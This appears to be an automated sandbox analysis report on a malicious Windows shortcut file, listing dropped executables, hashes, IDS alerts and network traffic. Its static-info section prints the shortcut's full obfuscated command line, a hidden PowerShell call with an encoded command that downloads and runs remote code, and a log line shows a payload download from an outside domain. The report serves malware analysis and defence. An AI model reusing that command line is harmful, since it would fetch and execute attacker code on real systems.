                                                                                      SHA-256:251E7BD12D8CE8A717324AE9C22D533A885A6E01C8A6DE340BABAF848A1C437F
                                                                                      SHA-512:F9A53979D3E53953D27BE2859C7AF7E13EF27649CE045A1D721CC2BCF70875D65662BCB09229865DF96C33FE6937A51C21259A4CFB86CE75157CFC2C19DD8DFD
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ......A....sW...1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A.....Z...1.......1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hY.M.............................A.p.p.D.a.t.a...B.V.1.....hY.M..Roaming.@......&W.<hY.M...........................9..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hY.M...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......&W.<hY................................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY......................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY(...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hY.M....8...........

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF46d973.TMP (copy)

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6222
                                                                                      Entropy (8bit):3.7388595143722565
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:xqAV8Z5FDCfPAk6skvhkvCCt2ula1dHI2ula1dHi:xqr4Z7l8i7l8A
                                                                                      MD5:AE3A603CC022AE1A719D668563B6CB63
                                                                                      SHA1:5D3D898D8132F480CF76E420997EB15DA5828F08
                                                                                      SHA-256:251E7BD12D8CE8A717324AE9C22D533A885A6E01C8A6DE340BABAF848A1C437F
                                                                                      SHA-512:F9A53979D3E53953D27BE2859C7AF7E13EF27649CE045A1D721CC2BCF70875D65662BCB09229865DF96C33FE6937A51C21259A4CFB86CE75157CFC2C19DD8DFD
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ......A....sW...1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A.....Z...1.......1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hY.M.............................A.p.p.D.a.t.a...B.V.1.....hY.M..Roaming.@......&W.<hY.M...........................9..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hY.M...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......&W.<hY................................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY......................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY(...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hY.M....8...........

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CNR21S45PWXHAI95IZBM.temp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):12
                                                                                      Entropy (8bit):0.41381685030363374
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:/l:
                                                                                      MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                      SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                      SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                      SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                      Malicious:false
                                                                                      Preview:............

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LZR83D5BXQONFPH42TOA.temp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6222
                                                                                      Entropy (8bit):3.7388595143722565
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:xqAV8Z5FDCfPAk6skvhkvCCt2ula1dHI2ula1dHi:xqr4Z7l8i7l8A
                                                                                      MD5:AE3A603CC022AE1A719D668563B6CB63
                                                                                      SHA1:5D3D898D8132F480CF76E420997EB15DA5828F08
                                                                                      SHA-256:251E7BD12D8CE8A717324AE9C22D533A885A6E01C8A6DE340BABAF848A1C437F
                                                                                      SHA-512:F9A53979D3E53953D27BE2859C7AF7E13EF27649CE045A1D721CC2BCF70875D65662BCB09229865DF96C33FE6937A51C21259A4CFB86CE75157CFC2C19DD8DFD
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ......A....sW...1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A.....Z...1.......1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hY.M.............................A.p.p.D.a.t.a...B.V.1.....hY.M..Roaming.@......&W.<hY.M...........................9..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hY.M...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......&W.<hY................................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY......................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY(...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hY.M....8...........

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12
                                                                                      Entropy (8bit):0.41381685030363374
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:/l:
                                                                                      MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                      SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                      SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                      SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                      Malicious:false
                                                                                      Preview:............

                                                                                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):0.34726597513537405
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlll:Nll
                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                      Malicious:false
                                                                                      Preview:@...e...........................................................

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_02jvzoyn.wwv.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_3gznci0x.l0t.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_bssqvhns.zgq.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_d4ecim4b.t5j.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_ez3nfpvc.dz0.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_jrbf2c3w.tvq.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_odz2uwy4.rga.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_qtx1r0k1.caq.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\deviceId.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):37
                                                                                      Entropy (8bit):4.185823555333621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:1FvBhiaTin:Vhun
                                                                                      MD5:2E34892691A39C064B28C2196A4735CB
                                                                                      SHA1:3037D60AA679A60A2A690C9EB314C27E8DB33452
                                                                                      SHA-256:7E677E793E94E3C36E5016ABDA2CF6E6B9E3BA3AEC1DF05E77CC3771967D219E
                                                                                      SHA-512:63323EB0221FA1FE3A83C65F75803AEE76A338D0685E1036BFAB1EA95636E221471D7CC7CA0D040B8CB183A2F5F8C6C892AD65AF0EA87AA9EB4588E435FE0D81
                                                                                      Malicious:false
                                                                                      Preview:.ECA4E7F645CEABCF141D602CC3089672..

                                                                                      C:\Windows\Temp\file

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8351232
                                                                                      Entropy (8bit):6.870213524632391
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:c6ELl9Xn8eQO54RgwIL6gTayjL9rjX27v/tIDZaFaOgj:c6EHXBQbRE5Tayjhrj2QaFaOS
                                                                                      MD5:0F611184B8A15C73AD43B82BDE807849
                                                                                      SHA1:4FBE94B19F1C69BA5ED4EF6DE134FAEC1B5B7270
                                                                                      SHA-256:2E77D02BBB8C853FE46B0CDC0D98A96CEF2C3DCB58CD98906CB1A2306F3213A4
                                                                                      SHA-512:C02A1D9646C662AFBD722F67AE141B6C8B75417AB800A605E085A02B95AECE0372CC8BFB5931820D586928E1A2F0EC5BFA56DA8C7E7B7204FAA8ECF2ABD63C29
                                                                                      Malicious:false
                                                                                      Preview:L[......................A............................................... ..M. Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/...%.........v...................._...............Z.......Z...............Z.......[.......[......Shbi............QD..e......f..........#....(..F..G8...............A.............................q............a..........................................)..Y...i)..U....A.......q..E............Q......1...........................).....A.............^............................./udyu...y&.......)..................!..a/l`o`fde..:..A....:..-..............!..aixes`ude......F........................./se`u`..]>3...^..A3...F.............A..A/e`u`........Q...o....{.............A.../qe`u`..E....q........{.............A..A/srsb........A.......W~.............A..A/sdmnb.......Q.......]~.............A..C........................................................................................................................................................................................

                                                                                      C:\Windows\Temp\log_rdp_08112024_04.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\Temp\myRdpService.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):293
                                                                                      Entropy (8bit):4.456614271346648
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:KVbKTAXI4WcdB4wcdqWAAAXI4WcdB4wcdqWAidAXI4WcdB4wcdqWAn:LTAXxWMrWAAAXxWMrWAQAXxWMrWAn
                                                                                      MD5:021C8800FE69CEFC2486D4436F76B94C
                                                                                      SHA1:DBE84B9062EB0EEFAEDF257723F0940549CDA3AD
                                                                                      SHA-256:38E8695FB12E9BFC7A9445890036B17D17D65BE1FCDE0177DE2CA16ACAE65D37
                                                                                      SHA-512:95F73DC154F3B77CDBD4B9B89EA324BB2E5821FC6810CD2528B00F6C5FE8E3AD3D8DC71B0E5393CEE1767EB127CE37F1C13B19DB791358EF5AAA68CF1D075F86
                                                                                      Malicious:false
                                                                                      Preview:16:47:31 - Internet connection..16:47:42 - The server returned status code '404' when status code '101' was expected...16:47:44 - The server returned status code '404' when status code '101' was expected...16:47:57 - The server returned status code '404' when status code '101' was expected...

                                                                                      C:\Windows\Temp\myRdpService.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\Temp\svczHost.exe
                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):9427456
                                                                                      Entropy (8bit):6.890384949334134
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:FagXMQc5xC9yZAaynfX9lvlJIg/EX4AAXC06GM3NOC02kf:DXMNYyGft7JIg/dAAXkGcu2
                                                                                      MD5:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                      SHA1:44C482F52EE997816D2582CF1D1C0A5295BA8DC9
                                                                                      SHA-256:5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
                                                                                      SHA-512:4BDA0642A063BFE3B86FF97C2F7500910BEA416507B9814C0DDAC0631B1B30ED47DCC6E22752B6566353B4F7386522A6E3C104B3EB055C5BA938522ED095B429
                                                                                      Malicious:true
                                                                                      Joe Sandbox View:
                                                                                      • Filename: U82W1yZAYQ.lnk, Detection: malicious, Browse
                                                                                      • Filename: ZGMW2wgPzY.lnk, Detection: malicious, Browse
                                                                                      • Filename: z0gG2GA9vG.lnk, Detection: malicious, Browse
                                                                                      • Filename: About-Us.docx lnk.lnk, Detection: malicious, Browse
                                                                                      • Filename: Job-Description pdf lnk.lnk, Detection: malicious, Browse
                                                                                      • Filename: 6GMmnAcpMs.lnk, Detection: malicious, Browse
                                                                                      • Filename: Meeting-Registration pdf lnk.lnk, Detection: malicious, Browse
                                                                                      • Filename: Mediatool-media-planning-guide lnk.lnk, Detection: malicious, Browse
                                                                                      • Filename: K9ZFXlZRuI.lnk, Detection: malicious, Browse
                                                                                      • Filename: H71PKTiNjk.lnk, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6 ..Xs..Xs..Xs...s..Xs..Yr..Xs..Ys,.Xs..[r..Xs..\r..Xs..]r..Xs..\r..Xs..Xs..Xs..]r.Xs..Xr..Xs..Zr..XsRich..Xs................PE..d...UR+g.........."....).:P...A................@.............................@............`...................................................|........................... ..L...............................(...P...@.............l..............................text....G.......H.................. ..`.managed..C..`....C..L.............. ..`hydrated.....`P..........................rdata..pq9...l..r9..>P.............@..@.data....x..........................@....pdata..............6..............@..@.rsrc...............................@..@.reloc..L.... .....................@..B................................................................................................................................................................

                                                                                      C:\Windows\Temp\svczHost.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):8351232
                                                                                      Entropy (8bit):6.8702135246323905
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:3qyaZJr8q0SLK/1JQv6udEr3onGwuNztOqZ+:6BgqrKNwvdK3iGwgOqZ
                                                                                      MD5:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                      SHA1:B53BD3683487B873D1D4D0077C432698702CC347
                                                                                      SHA-256:41310862773697FF00306B143FFDA60C87D2EA4E44774289F1F2ED0E74D2CF1B
                                                                                      SHA-512:E7FC0571CB0BA516794A52A3277D3CB15049FFB739EBC203D80E6F9FCD08F6B5848AF470BA0F082A3D039472A83ED87512C0E4750946406649097C097EECFF40
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................^...............[.......[...............[.......Z.......Z......Rich............PE..d......g.........."....)..G..F9...............@.............................p............`..........................................(..X...h(..T....@.......p..D............P......0...........................(.......@............._..............................text...x'.......(.................. ..`.managed..;..@....;..,.............. ..`hydrated......G..........................rdata..\?2..._..@2...G.............@..@.data........P...n....z.............@....pdata..D....p........z.............@..@.rsrc........@.......V..............@..@.reloc.......P.......\..............@..B........................................................................................................................................................................................

                                                                                      \Device\ConDrv

                                                                                      Download File
                                                                                      Process:C:\Windows\Temp\svczHost.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):69
                                                                                      Entropy (8bit):4.90992700164429
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:eDLpHWf0wUWdhtq1OKxxTWy:eDLp2f0cdht6dTWy
                                                                                      MD5:C947A718F37EEEEE960E6A9321EAAB23
                                                                                      SHA1:9AC9B8A3AB34053ECE8C3D50838332CF8FA2289A
                                                                                      SHA-256:24313F3BA0D4A694FB7255D083DBA61EB61F7A31FC7C20131C32DC1B433BABED
                                                                                      SHA-512:359C4BA4C062C0B862BB1B35C260B36F580A6F5309866D887187270EC8D5BBC5F522403D06BD2CCF9C79E461A5045DEDA9642120CAB51B0B0E8D7CF95931B540
                                                                                      Malicious:false
                                                                                      Preview:Begin download https://uyt1n8ded9fb380.com/StaticFile/RdpService/12..

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=341, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                      Entropy (8bit):8.370478179566303E-4
                                                                                      TrID:
                                                                                      • Windows Shortcut (20020/1) 100.00%
                                                                                      File name:gW6FHWNFzR.lnk
                                                                                      File size:17'825'792 bytes
                                                                                      MD5:a4c59e5ed953a077c26e3493fd12485b
                                                                                      SHA1:9b52cc40deda887fb9dfbb2ca6eec9e7e3d233fb
                                                                                      SHA256:6bcf81075209485ee886b6b3a170129a30b777cf496b23c8d1f69e4ca8b9de2b
                                                                                      SHA512:f2dcac54e29669ff4cd70818fd49852d0265c1e95ff23999c926e93bb6cfca9e2c7b4b7e5c736b542fec035ba9a41c582ab72f0b581517b05355879d525adb84
                                                                                      SSDEEP:48:8r0D4+AyXAg5d5M34A+5MwJDrOcUVQJCRkpkVWlInx4OqI:8gDVAywg5ddOwJysCCKVWlwOh
                                                                                      TLSH:9D07FB0029FA00C9F1635B755BF8F6F75175F464193EA2F5114189194B75584C833B72
                                                                                      File Content Preview:L..................F.B..................................U.......................,./.v. ./.k. .".S.t.a.R.T. ./.M.i.^.n. .".". .P.o.W.^.E.R.S.h.E.l.^.L. .-.W. .H.^.I.D.^.D.e.^.N. .-.n.^.o.^.L.^.o.^.G.O. .-.N.^.o.P. .-.E.p. .b.Y.P.a.s.s. .-.E.^.n.^.C.^.o.d.e

                                                                                      File Icon

                                                                                      Icon Hash:69e9a9a9a3a3a1a5

                                                                                      Static Windows Shortcut Info

                                                                                      General

                                                                                      Relative Path:
                                                                                      Command Line Argument:/v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit
                                                                                      Icon location:%SystemRoot%\System32\imageres.dll

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-08T10:45:47.049876+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049752172.67.137.62443TCP
                                                                                      2024-11-08T10:45:49.235198+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049754172.67.137.62443TCP
                                                                                      2024-11-08T10:45:51.366013+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049756172.67.137.62443TCP
                                                                                      2024-11-08T10:46:15.438746+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049770172.67.137.62443TCP
                                                                                      2024-11-08T10:46:28.471271+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304977423.222.16.17443TCP
                                                                                      2024-11-08T10:47:19.855477+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049777172.67.137.62443TCP
                                                                                      2024-11-08T10:47:31.939690+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304977823.209.72.21443TCP
                                                                                      2024-11-08T10:48:02.856786+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049783172.67.137.62443TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 8, 2024 10:45:43.692924976 CET49751443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:45:43.692955017 CET44349751172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:45:43.693090916 CET49751443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:45:43.700859070 CET49751443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:45:43.700890064 CET44349751172.67.137.62192.168.11.30
